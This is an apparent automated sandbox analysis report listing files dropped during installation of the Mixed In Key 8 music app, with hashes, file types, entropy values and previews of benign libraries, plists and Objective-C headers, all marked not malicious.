SSDEEP:	768:QnU4w0d6RFrL6ptL0Xi8X7qplJ2lzhGMExWXO25ErO1iezr+XTOCCYDZ7+8dab8:lRF+tL0y8rOnMExuyyfiK
MD5:	9D7F9A3116555FA2C2FFA214FE7BA30C
SHA1:	8879A5454ED72E53CE770DCCC4122F68E29949F7
SHA-256:	A91A9077FAC4CC14B58D4ECEAC6ACE8CFBC1CD24C2278BC57A980B86ECAA1446
SHA-512:	FF38E0D6D2E7FBAAF2176015E572251B571C9668DEAF93197227180F6023E0F616F2F0C9751E29CAB42436CD9A08020E267157CED4F23B8F714110C657DDA439
Malicious:	false
Preview:	....................................H...__TEXT...................p...............p......................__text..........__TEXT...........3...............3..............................__stubs.........__TEXT...........a...............a..............................__stub_helper...__TEXT..........Lb......<.......Lb..............................__cstring.......__TEXT...........c...............c..............................__objc_methname.__TEXT...........d...............d..............................__const.........__TEXT...........d...............d..............................__swift3_typeref__TEXT...........e...............e..............................__swift3_reflstr__TEXT...........g...............g..............................__swift3_fieldmd__TEXT...........g......T........g..............................__swift3_capture__TEXT...........g......$........g..............................__swift3_assocty__TEXT...........h......`........h..............................__swift2_proto..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_Wh10S7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	104816
Entropy (8bit):	4.8555468848268895
Encrypted:	false
SSDEEP:	3072:o6BGhEgmIt5C0Kf2LrU/0z/qn5lDx0LXB2EnGOZWWzbG0ac4oUEzkX7B0Mn6DmKx:oSIZ/
MD5:	E029F5936C9A99876F22DE03D8E78962
SHA1:	60594976CC0A2E55B2D72CFE5580B562DF5A3BD2
SHA-256:	70FB7D3B5E768E820373C308CD111DF8B814EFB6FC5DEA95DAB85E375F8B5E9E
SHA-512:	D4464562CCEBE4D90B59CAC6BE40AB4A202A08A37502785F4D6EABE356CC9118D3D368F1FF8C217E3EE2E91456D7F70230AEF1B07022FEE0B74BC658035A7793
Malicious:	false
Preview:	....................8...............X...__TEXT..........................................................__text..........__TEXT..........@`.......6......@`..............................__stubs.........__TEXT..........`...............`...............................__stub_helper...__TEXT..................<.......................................__cstring.......__TEXT..........P...............P...............................__objc_methname.__TEXT..........M.......H.......M...............................__swift3_typeref__TEXT..........................................................__swift3_capture__TEXT..........................................................__const.........__TEXT..........................................................__objc_classname__TEXT..................9.......................................__objc_methtype.__TEXT..........................................................__info_plist....__TEXT..................E.......................................__unwind_info...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_bHpW08 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	45072
Entropy (8bit):	3.546164647554527
Encrypted:	false
SSDEEP:	192:0Mn+bmuNTp1jNxdWGQkmmtVEjoLzr+RjG8P0Bzrj37SzrOh5fwrO/Ts6z3rv75aW:0Mn+vFxHr+Q8YrOrKWrO/T3rNab8er
MD5:	56D19F3001EB31B52B8D61EA54433AF0
SHA1:	CBC1DEF81F242C098D30011EB73FFA5EB3CBA522
SHA-256:	FDC50AD55EF91C295ECB4DDA4996BB06374482B6712BCEF01F78B37E9CB75765
SHA-512:	073A1DA2DD277876D4E01157B0F4495E3AECB149DDFAB24416F02BC07DB37A513E9AC2C68C41A0416DF00F5B332344DDAAA1CCF4F425B7D32EED960E21BEE444
Malicious:	false
Preview:	........................................__TEXT...................@...............@......................__text..........__TEXT..........0:......;.......0:..............................__const.........__TEXT..........l=..............l=..............................__info_plist....__TEXT..........n=......?.......n=..............................__unwind_info...__TEXT...........?......H........?..................................8...__DATA...........@...............@..............................__objc_imageinfo__DATA...........@...............@..............................__data..........__DATA...........@......(........@..............................__common........__DATA..........0@..................................................H...__LINKEDIT.......P.......p.......P.......`..........................8...........6.......@rpath/libswiftIOKit.dylib......"...0............P.......................P..............xW..A....[..P.......P...............5...<.......................................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_qvsqiH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	81792
Entropy (8bit):	4.957162317687213
Encrypted:	false
SSDEEP:	768:ySi6/tXYMyHjeNXu5zLlQuFOYgBGoyrWB1uUKznsqjjaDJrqkwMBD3Y8HPab8q:fR/GMaH51dgB78znCqkU4K
MD5:	EE02C1BA57D5563D61504A97B751D8E1
SHA1:	FA31800B62977AF3526E05AC6E04557645D15958
SHA-256:	421DC06E1A9C7C295957100D922DBFC028C0C9490E7B6FA624FDA7EC27FED8CE
SHA-512:	F46638AB8301DD1B4A99121FEA9BE14DA3D932982C52E3C71A7C2A905F68A2E5979F86395035190501D491DF3BA4173CE71F5996D828627E4B411E0E3FD33BE8
Malicious:	false
Preview:	....................P...............X...__TEXT..........................................................__text..........__TEXT...........B.......1.......B..............................__stubs.........__TEXT..........\t......~.......\t..............................__stub_helper...__TEXT...........t...............t..............................__const.........__TEXT...........u......j........u..............................__swift3_typeref__TEXT..........0w..............0w..............................__swift3_reflstr__TEXT...........y...............y..............................__swift3_fieldmd__TEXT..........(y..............(y..............................__swift3_assocty__TEXT..........Dy..............Dy..............................__swift2_proto..__TEXT..........0z......P.......0z..............................__swift3_builtin__TEXT...........z......(........z..............................__info_plist....__TEXT...........z......G........z..............................__unwind_info...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_u2pNQj Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	61392
Entropy (8bit):	3.0553938616638145
Encrypted:	false
SSDEEP:	384:CvG8AsTuOdWx0LB/r+Q8YrOr2aCrSHrNab8er:CvG6TuO8x0j8vab8
MD5:	2E7ADDEAE4A46D6AA373431AE458518B
SHA1:	6B99EC2209B106D04070D18E17D8B501161AF2C6
SHA-256:	036D2D3BEF31ACA385F5C24C1DBE84B3B4AF7FE005232FBFC91C335A1BC6B1E9
SHA-512:	CE7AECBE0E32ACA93DE1E6264EE763FE9B6E908F3A8EBE1DB296F0756E89F5E4A731FA2CFB7B2C42CAFD37FBC5B204AEA22652CDEF1747A0D331907A71D5A5ED
Malicious:	false
Preview:	................!...................X...__TEXT..........................................................__text..........__TEXT...........r......<........r..............................__stubs.........__TEXT...........y......0........y..............................__stub_helper...__TEXT...........z......`........z..............................__const.........__TEXT..........pz..............pz..............................__cstring.......__TEXT...........{......!........{..............................__objc_methname.__TEXT..........1{......+.......1{..............................__swift3_typeref__TEXT..........`{......d.......`{..............................__swift3_assocty__TEXT...........{...............{..............................__swift2_proto..__TEXT...........{...............{..............................__swift3_fieldmd__TEXT...........{...............{..............................__info_plist....__TEXT...........\|......I........\|..............................__unwind_info...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/.BC.T_vJQxkk Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS\|APP_EXTENSION_SAFE>
Category:	dropped
Size (bytes):	175856
Entropy (8bit):	5.304424181928789
Encrypted:	false
SSDEEP:	3072:OYnJbOlyHrtqrAoHVeMEKtQ9mxdVhe7/U41p4Q0ywCF2cwowsUWb7xRsMNtNtW2/:xJHtqkYlEBo6/c/j0FzK/km/IFCMqW
MD5:	6F03B266D87B2899E22BE36D9EB48400
SHA1:	D5551D5AC615CD7A505F32A387AC2523B106922F
SHA-256:	66B510F3C97F0A168AE40EBD66F267B7CDC760608CE1FDB13034C34E49652686
SHA-512:	FCB9127BFB1CC425CF33EA5B1D9502949F583C61ACB2DB755CE99B21086702D215BBAA424FDB7408384CBEC29CB09B64123118298B2C808724469405D54D35B1
Malicious:	false
Preview:	................$...8...................__TEXT...................0...............0......................__text..........__TEXT..........................................................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..................:.......................................__const.........__TEXT..........0...............0...............................__objc_methname.__TEXT..........................................................__cstring.......__TEXT..........................................................__swift3_typeref__TEXT..........p...............p...............................__swift3_capture__TEXT..........P"......<.......P"..............................__swift3_fieldmd__TEXT..........."......l........"..............................__swift3_reflstr__TEXT...........#...............#..............................__swift3_assocty__TEXT...........#...............#..............................__swift2_proto..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/.BC.T_JU6hLr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|WEAK_DEFINES\|BINDS_TO_WEAK\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	1799120
Entropy (8bit):	6.5073881224127526
Encrypted:	false
SSDEEP:	49152:5bi5SuqHMLddZkkzREdO1IIKJq8mpJ4UUpKi7jaayyww5gCWN//l8NgAaaaUgCWv:M5S1kznIIlVmnw
MD5:	FDA11F36E166AA91D07AB8670E83F516
SHA1:	4FA0A50BE9D9B62547E013EAB199B41A2DF59BAA
SHA-256:	AB500751465B470C16F8605A9964D82A823BC0C0B8AB3A54445041D79DFC72F2
SHA-512:	FA04AC6163F1B9D0C29C68E5E14C4FB695CCD9FE1585D166D9B5F5BBB33BE6CE6B148461B96C611E6A055C3C0C77CBA6FA3469BACCE7DD673E379AA7DF665F51
Malicious:	false
Preview:	....................`...................__TEXT...................P...............P......................__text..........__TEXT........... .......D....... ..............................__stubs.........__TEXT...........d...............d..............................__stub_helper...__TEXT..........Xk..............Xk..............................__gcc_except_tab__TEXT..........Dv..............Dv..............................__const.........__TEXT...........].......R.......]..............................__cstring.......__TEXT..................=.......................................__objc_methname.__TEXT...........5......*........5..............................__objc_classname__TEXT..........'T..............'T..............................__objc_methtype.__TEXT...........V...............V..............................__unwind_info...__TEXT...........%.......K.......%..............................__eh_frame......__TEXT..........xq......x.......xq......................................__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/.BC.T_itp2cS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1392
Entropy (8bit):	5.197175787096031
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NoGe4GMa6jG42Rw0gp/sH2PgCGexwMZhGt0G+l:cfyfVtoGJGcjGjO0giH2ICGcwcGt0G+l
MD5:	C02E9853E2E5AB1933AD559842C08252
SHA1:	343F3777FE2FE423DE6061AAF866D8DFCD921202
SHA-256:	3DF14511C12BCDA716B6750A1A213DA098E5882F8A032F86490297DBC4C79B44
SHA-512:	0951AE00077BB87D738D9C230B42FCE66A1A07476A9819D5176F0A05A844607ADB428222EC3B95A7F76D16BFCF9825B2B28A271DEE3BF9C5B7A9C9C456C36EEF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>DanceabilityAudioEngine</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.energetic.DanceabilityAudioEngine</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>DanceabilityAudioEngine</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/.BC.T_w7YJYB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
SSDEEP:	3:Qwh+yEilSlJlqXMLLkFlVlRDBWjUoFY9n:QpXioJqcLwVlRNWwou9n
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/.BC.T_G0mN3z Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	2953
Entropy (8bit):	4.994516456350389
Encrypted:	false
SSDEEP:	48:cfyWUcSv+s6ZvcT0v6mef/GvH1qOPOBLSejzFXDj9KHhamOn/GvH1qOvzX5vy:CyWUcXs6ZvcTIkYT2BLDzFNQpO/YTbJa
MD5:	E1002528A672D80FE4DC9FFED0184217
SHA1:	985E45C30FBEEC840430C270769CF6BFCBFEE83D
SHA-256:	54ADA1D33BE97161AFEBF8B79C053FE5F1730D4EFFE085AD71C3EEC074E925B2
SHA-512:	98983B485DAE9FDDC7480C7FA65B2DCCA887AA957821D390345D65FF2748F73FC80CDC52DD61EB181C4FC1B5947CBFA72E9E8C226A2AA7DF1C06EE0E3554CF6E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...ND83d/4v5CPeYGGq+GbY382SEgI=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....ND83d/4v5CPeYGGq+GbY382SEgI=....</data>....<key>hash2</key>....<data>....PfFFEcErzacWtnUKGiE9oJjliC+KAy+GSQKX28THm0Q=....</data>...</dict>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>hash2</key>....<data>....Oc8u4Ht7Mz58F50L9NeYpbcq9qTlhPUeZCcDu/pPyCg=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>rules</key>..<d

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/.BC.T_bvP0py Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|WEAK_DEFINES\|BINDS_TO_WEAK\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	505920
Entropy (8bit):	6.22820383312003
Encrypted:	false
SSDEEP:	12288:Sj77LGxK8ke61Ua3OffFTYWnRgqqUSnRgqqU/a00RTVqqWRTVqqWjv66kk33W3j7:ovZ11POffFTYWnRgqqUSnRgqqU/a00RU
MD5:	97D4ACAD87C8211C1DBBF525B19A783D
SHA1:	9357621715356EAE618B627FBFC58243F429248D
SHA-256:	FE87DD1A4FE8A99E6BA61F74C15044AF54433DEC6FB0BAA052D35B68AA98765D
SHA-512:	0776E89240F7B670549D76D8F77E554DA6B5CABAF7E611C570F3FD666CC4B8FEA285046DCCC1D381F16EB55742B8301EEF853EC6D4307A557C260F20ECBAF98A
Malicious:	false
Preview:	....................(...................__TEXT...................P...............P......................__text..........__TEXT.........................................................__stubs.........__TEXT..........b...............b...............................__stub_helper...__TEXT..........t...............t...............................__const.........__TEXT..........................................................__cstring.......__TEXT..........x.......=.......x...............................__objc_methname.__TEXT..........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT...................G......................................__gcc_except_tab__TEXT...........V.......).......V..............................__unwind_info...__TEXT..........h...............h...............................__eh_frame......__TEXT..........H...............H.......................................__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_01k060 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	686
Entropy (8bit):	4.967762859263273
Encrypted:	false
SSDEEP:	12:Vw8/u2Lk1/oNsSsVKspyNsVcschlsEfsGsPsqwsRsv5csRHsfspyEe:HTL4gCBSs
MD5:	6E7E1D9DD0AC8C2F9BE429D195ADD640
SHA1:	6C194CAB79175EA1BA3EEE3E709C6BC15245B761
SHA-256:	E28C287D02B3B094B2808BAA8C0482E8F9AB8ACBE0ED18982B079EF8EE9ABC82
SHA-512:	9408083A63868D43B298000771E39E2D1BBA8E706A1D352B59A19134AFE19BC3B49959227AE58FAF39609453B59174F2439DBB2FAC105D0F3A952CB8D24AC51E
Malicious:	false
Preview:	//.// MIKAnalysis.h.// MIKAnalysis.//.// Created by Patrick Machielse on 19-01-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//...#import <MIKAnalysis/MIKKeytable.h>.#import <MIKAnalysis/MIKAnalysisSegment.h>.#import <MIKAnalysis/MIKEnergySegment.h>.#import <MIKAnalysis/MIKAnalysisCuePoint.h>..#import <MIKAnalysis/MIKKeyAnalyzer.h>.#import <MIKAnalysis/MIKNewKeyAnalyzer.h>..#import <MIKAnalysis/MIKBeats.h>.#import <MIKAnalysis/MIKBeatAnalyzer.h>..#import <MIKAnalysis/MIKVolumeAnalysis.h>.#import <MIKAnalysis/MIKVolumeAnalyzer.h>..#import <MIKAnalysis/MIKAudioSpectrum.h>.#import <MIKAnalysis/MIKWaveformAnalyzer.h>..#import <MIKAnalysis/MIKEnergyAnalyzer.h>

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_3DRnON Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	601
Entropy (8bit):	5.233783714049606
Encrypted:	false
SSDEEP:	12:VHsPqOXAUxVS532HsR2WqQ2VipzcVipz/uHwRkt5IPVen:0qy1s/2WqrWcGlRktmAn
MD5:	8B877A2615EEF7F006E66D44F6150D73
SHA1:	F13E3D959513A0D326790B2CF5D4AC65B045FC87
SHA-256:	DFCF64A5DEE82FF02604D0ECC1B6B79A8FA7BE0C1799AE7AF9DFB4EC6AEF650E
SHA-512:	227E409026139BF33BED1E0D802882DBA4221C5628779F889BBD5F1D11EF5C82391A8B58FE93DA07CAF2D1F244EF5629DD80CE8D5A1C8121EE5B1FEFF455BB92
Malicious:	false
Preview:	//.// MIKWaveformAnalyzer.h.// MixedInKey.//.// Created by Andrew Madsen on 9/8/11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import "MIKAudioSpectrum.h"...@interface MIKWaveformAnalyzer : NSObject.+ (instancetype)analyzerWithAudioLength:(long long)numberOfSamples;.- (instancetype)initWithAudioLength:(long long)numberOfSamples;..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList )ioData;.- (BOOL)finishAnalysis;..@property (nonatomic) MIKAudioSpectrum spectrum; /* copies */.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_3sY5yl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1820
Entropy (8bit):	5.003113809377265
Encrypted:	false
SSDEEP:	24:Pd371FGiIA/BHroYLWmynN5uZhhop8MeK+5EXPP9n:FL1FGi//BLXSmyuZDoCM9
MD5:	371151931C963B42F0783A22596ED5E2
SHA1:	AEEAC619F69DF09138B5DEA6E7C550DF78307C9A
SHA-256:	7FBFD1A04391AB3D82116B23B4BBA80094292929BE72314631F81FB6E249FDD8
SHA-512:	454EE0326D29A65AE319C9D51EC2DEB325F8D4A3DBF528F33D98C527016AF67747C6C3B6EB0541CF277193E655ED0A36D99F1E72CA7D6BA24D3F0D1B873BB732
Malicious:	false
Preview:	//.// MIKAnalysisSegment.h.// MixedInKey.//.// Created by patrickm on 06-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.../!. @header..MIKKeySegment. @abstract Represents file segments. @discussion This is an intermediary object, used to store file analysis.....parameters, and to send / receive analysis.results to / from the.....web service. The final results are transferred to MIKDataSongKeySegment.....objects for storage in the database../.@interface MIKAnalysisSegment : NSObject <NSCopying, NSCoding>.+ (instancetype)segment;.+ (instancetype)segmentWithJSONDictionary:(NSDictionary )JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary )JSONDict;.- (NSComparisonResult)chronologicalCompare:(MIKAnalysisSegment )otherSegment;..@property (nonatomic, readonly, copy) NSDictionary JSONDict;.@property (nonatomic, readwrite) float pitch;........//.range pitch.@property (nonatomic, readwrite, copy) NSArray *fea

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_EG9v8h Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	782
Entropy (8bit):	5.059556885346247
Encrypted:	false
SSDEEP:	24:XV+lhPAW3iqAWM1bzdAfM1a3kebAfki5AfGu4MWAlW:XV+4Yi7RC0o/kQOubpW
MD5:	3664E4EA9C8D239CB2913CADBDBE9A82
SHA1:	CA0A3D0629511C5049A62A3C7D993C18A683EBEA
SHA-256:	6505FA759441E042A11E17575E9C2FDD7C6C8B8E31D959515AE75C29CDC25446
SHA-512:	AD42A6310E55CA9F2BD48019966C0BCAD859930B1EC8F58CF9BB05BF3196445F538C889C49B4E2F63EE499B9B83B970095F815E70134D235305A6A9BA5782ED0
Malicious:	false
Preview:	//.// MIKBeats.h.// MixedInKey.//.// Created by patrickm on 24-02-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Cocoa/Cocoa.h>...@interface MIKBeats : NSObject <NSCoding, NSCopying>.- (instancetype)initWithBeatTimes:(NSArray )times;.+ (instancetype)beatsWithBeatTimes:(NSArray )times;..- (NSTimeInterval)nearestBeatTime:(NSTimeInterval)time duration:(NSTimeInterval)duration;.- (NSUInteger)nearestBeatIndex:(NSTimeInterval)time;.- (NSTimeInterval)previousBeatTime:(NSTimeInterval)time;.- (NSTimeInterval)nextBeatTime:(NSTimeInterval)time;..@property (nonatomic, copy) NSArray<NSNumber > beatTimes;.@property (nonatomic) float tempo;.@property (nonatomic, readonly) float beatTempo;.@property (nonatomic, readonly) NSUInteger numberOfBeats;..@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_GCwiu2 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	745
Entropy (8bit):	5.33141788503387
Encrypted:	false
SSDEEP:	12:RuE282M/oAUxVSDSERz42d8Z1FGvjqTsuHwqouuASPsqSu/kqhHoMn:R92Mg1WDbz42d8Z1I7UYYL4kwXn
MD5:	92A20298E67AA8268AB667DC9B090634
SHA1:	B49A5E99A4BC1D6AFF81F16D35DB451D4D65FFDD
SHA-256:	5B165EA7B7D77ACA6AF71ADF6C6DCB22257DBD778AFF227FDF96B6D38A972ACB
SHA-512:	A2CB3BBB6396B1B8831B04F620E6D3496990E98E42A3C4C6DFB8E95659E84B7D14257DA2E020C821CD365B60C582DED78684CD2B47224EE6D099B5EC2B226121
Malicious:	false
Preview:	//.// MIKEnergyAnalyzer.h.// MIKAnalysis.//.// Created by patrickm on 08-08-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...@interface MIKEnergyAnalyzer : NSObject.- (instancetype)init NS_UNAVAILABLE;.- (instancetype)initWithDuriation:(NSTimeInterval)duration skipStart:(double)startFraction skipEnd:(double)endFraction NS_DESIGNATED_INITIALIZER;.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList )ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;..@property (readonly, copy) NSArray energySegments;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_JgVVWy Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1374
Entropy (8bit):	5.247853330766811
Encrypted:	false
SSDEEP:	24:EZS1WDoFmx8mPWz9hcDHYAikN4dsSdqLxG:Ek1WDmz9uHkhFdQQ
MD5:	4240145BF057EE0ADB3DA147CB0A4618
SHA1:	AC36C6CBAB2926B67172E6A1561F1E7C4886906F
SHA-256:	F2DC4B7422FF4A50C29D7EC19EDA0175265ECA5DCA48D5FCE01CF9D6FABE657E
SHA-512:	85B2BE9DA25EAA080D5905631E548022292FDCD207B514BE72D6BC00F9DD3FD4EA7926380C8C2C9CF9DB8DA64897E366C552E82ADAB06307AE96CF874FF6D595
Malicious:	false
